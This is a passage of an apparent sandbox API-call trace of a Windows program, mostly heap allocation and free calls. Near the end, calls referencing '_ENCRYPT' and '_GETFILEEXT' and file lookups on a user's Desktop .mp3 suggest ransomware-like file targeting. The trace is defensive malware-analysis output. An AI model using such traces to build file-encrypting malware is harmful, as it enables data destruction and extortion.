0x76e078 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.098] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0077.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0077.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0077.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.100] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0077.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0077.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0077.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0077.101] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0077.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0077.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0077.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0077.102] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b138 [0077.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76b138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.104] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0077.104] CloseHandle (hObject=0x140) returned 1 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0077.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.105] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.105] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0077.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0077.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0077.105] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0077.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0077.105] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0077.106] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.106] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0077.106] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0077.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0077.106] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0077.106] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.106] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0x7aadcd00, ftLastWriteTime.dwHighDateTime=0x1d5d8d2, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x0, dwReserved1=0x657690, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 0x6b89b8 [0077.107] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0077.107] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.107] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0x7aadcd00, ftLastWriteTime.dwHighDateTime=0x1d5d8d2, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x0, dwReserved1=0x657690, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 0x6b89b8 [0077.107] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0077.107] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3\"", 